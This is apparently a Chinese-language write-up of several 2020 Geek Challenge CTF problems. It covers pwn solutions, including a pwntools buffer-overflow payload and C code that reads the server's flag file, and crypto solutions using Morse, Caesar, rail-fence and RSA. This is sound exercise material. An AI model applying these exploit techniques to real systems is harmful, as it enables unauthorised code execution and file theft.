2020极客大挑战部分wp
pwn
数学咋样
payload
# coding = utf-8
from pwn import *
import time
i = remote("81.69.0.47", 1111)
i.recvline()
i.recvline()
i.recvline()
for ii in range(20):
s1 = i.recvline()
s = i.recvline()
# print(s1,s)
l = s.replace("![%d]"%ii, "").replace(" ", "").split(",")
num1 = int(l[0].replace("num_1=", ""))
num2 = int(l[1].replace("num_2=", ""))
# print(num1 + num2)
# i.recvline()
print i.recvline()
print i.recvn(18)
# time.sleep(1)
i.sendline(str(num1 + num2))
# print "sucessll
try:
while True:
print(i.recvline())
except :
print("getflag!!!!")
nc 连接出现的模板, 计算二十次,就能拿到 flag
运行 payload
群里atao师傅写的 payload
runcode
payload
#include<stdio.h>
int main()
{
FILE * fp;
char buffer[80];
fp=popen("cat /home/ctf/flag","r");
fgets(buffer,sizeof(buffer),fp);
printf("%s",buffer);
pclose(fp);
//execl("/bin/sh", "base64", "/home/ctf/flag");
}
这能挡得住我?
liuzhuang-secret
# coding = utf-8
from pwn import *
sh = remote("81.69.0.47","1000")
addr = 0x000000040079B
sh.recv()
sh.send("a"*(0x70+8) + p64(addr))
sh.interactive()
crypto
二进制情报员
二战情报员刘壮
作者:
liuZhuang
简介:
你能知道刘壮在说什么?得到的flag包裹上SYC{} .-../.----/..-/--../..../..-/....-/-./--./..--.-/../..--.-/--../.----/-.--/.----
提示: 刘壮早上起来打摩丝
摩斯电码
在线解密得
L1UZHU4NGIZ1Y1
getflag
SYC{L1UZHU4NGIZ1Y1}
铠甲与萨满
作者:
liuZhuang
简介:
YEI{roafnagtmroafnagtm_hgtmhgtmhgtm}
提示: kaisa?
思路
凯撒加密, 爆破密钥, 开头是 SYC
#coding = utf-8
'''
用于凯撒解密算法
'''
s1 = 'abcdefghijklmnopqrstuvwxyz'
s2 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def kaiser_decrypto(s,key):
destr = ''
for i in s:
if i.isalpha():
if i.isupper():
index = s2.find(i)
destr += s2[index-key]
else:
index = s1.find(i)
destr += s1[index-key]
else:
destr += i
print(destr)
return destr
for i in range(1,25):
kaiser_decrypto("YEI{roafnagtmroafnagtm_hgtmhgtmhgtm}",i)
XDH{qnzemzfslqnzemzfsl_gfslgfslgfsl}
WCG{pmydlyerkpmydlyerk_ferkferkferk}
VBF{olxckxdqjolxckxdqj_edqjedqjedqj}
UAE{nkwbjwcpinkwbjwcpi_dcpidcpidcpi}
TZD{mjvaivbohmjvaivboh_cbohcbohcboh}
SYC{liuzhuangliuzhuang_bangbangbang}
RXB{khtygtzmfkhtygtzmf_azmfazmfazmf}
QWA{jgsxfsylejgsxfsyle_zylezylezyle}
PVZ{ifrwerxkdifrwerxkd_yxkdyxkdyxkd}
OUY{heqvdqwjcheqvdqwjc_xwjcxwjcxwjc}
NTX{gdpucpvibgdpucpvib_wvibwvibwvib}
MSW{fcotbouhafcotbouha_vuhavuhavuha}
LRV{ebnsantgzebnsantgz_utgzutgzutgz}
KQU{damrzmsfydamrzmsfy_tsfytsfytsfy}
JPT{czlqylrexczlqylrex_srexsrexsrex}
IOS{bykpxkqdwbykpxkqdw_rqdwrqdwrqdw}
HNR{axjowjpcvaxjowjpcv_qpcvqpcvqpcv}
GMQ{zwinviobuzwinviobu_pobupobupobu}
FLP{yvhmuhnatyvhmuhnat_onatonatonat}
EKO{xugltgmzsxugltgmzs_nmzsnmzsnmzs}
DJN{wtfksflyrwtfksflyr_mlyrmlyrmlyr}
CIM{vsejrekxqvsejrekxq_lkxqlkxqlkxq}
BHL{urdiqdjwpurdiqdjwp_kjwpkjwpkjwp}
AGK{tqchpcivotqchpcivo_jivojivojivo}
密钥应该为 6
getflag
SYC{liuzhuangliuzhuang_bangbangbang}
成都养猪二厂
作者:
ljahum+
简介:
题目地址:https://share.weiyun.com/FdTTmTP7 题目描述:v先生家里蛮大的,还有很多啤酒。v先生之所以能过上这样快哉的生活可能是因为他的养猪场厂围上了高高的栅栏
提示:
flag格式 SYC{xx_xx_xx},除SYC外其他字母小写 单词间隔开添加下划线
v先生喝得迷迷糊糊的时候说了一些胡话,你从一堆嘟哝中听清楚了其中一小段:
...(嘟哝)..
(int)sth_import = 889464/114514;
....(嘟哝)...
盲猜猪圈密码
对照着翻译
SSYIRCEEHSAGIULISOLBHY
SHI SSS YAO IGLRIBCUHELYE
SS
YI
RC
EE
HS
AG
IU
LI
SO
LB
HY
SYC SLHSS IE AIY RE GO HILUB
百般尝试后,看了 wp , 发现是 w 型的栅栏
889464//114514 的结果是 7 ,代表七层栅栏
getflag
SYC{his_house_is_really_big}
babyrsa
作者:
ljahum+
简介:
题目地址:https://share.weiyun.com/lbPVqZN2 题目描述:因为每晚都有小毛贼翻过v先生的栅栏去对猪圈搞破坏,v先生的养猪场不久就倒闭了。失落的v先生感觉不会再爱这个世界了。在他起身去找工作之前留下了一张纸条。
分数:
from Crypto.Util.number import *
from gmpy2 import *
from secret import p,flag
flag = bytes_to_long(bytes(flag,encoding='utf-8'))
q = getPrime(1024)
n = q*p
phi_ = (p-1)*(q-1)
e = 0x10001
d = invert(e,phi_)
c = (pow(flag, e, n))
print(long_to_bytes(pow(c, d, n)))
print((c,q,n))
'''out put
(177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194,
166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043,
191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149)
'''
rsa算法
给了 c, q, n ,e
求 p : n//q
求 d: d = invmod(e,(p-1)*(q-1))
求 flag : flag = pow(c,d,n)
# coding = utf-8
import libnum
n = 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149
q = 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043
c = 177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194
e = 0x10001
p = n//q
print(p)
d = libnum.invmod(e,(p-1)*(q-1))
# print(d)
i = pow(c,d,n)
print(libnum.n2s(i))
getflag
SYC{Bron_to_be_the_human_I_am_sorry}